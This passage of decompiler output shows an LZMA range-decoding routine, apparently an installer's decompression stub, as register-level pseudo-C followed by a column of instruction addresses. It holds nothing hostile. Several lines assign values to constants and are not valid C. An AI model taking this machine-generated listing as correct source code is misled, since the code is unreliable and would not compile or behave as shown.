							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                    0x00000000
                    0x0040604c
                    0x0040604c
                    0x00406051
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x004066b8
                    0x004066b8
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x0040672e
                    0x0040672e
                    0x00406734
                    0x00406734
                    0x00000000
                    0x00406709
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x00000000
                    0x004068bc
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x00000000
                    0x0040672b
                    0x00406053
                    0x00406053
                    0x00406057
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062e1
                    0x004062e4
                    0x00406287
                    0x0040628d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004062e6
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00000000
                    0x00406284
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406190
                    0x00406193
                    0x0040610a
                    0x0040610a
                    0x00406110
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e9
                    0x00406201
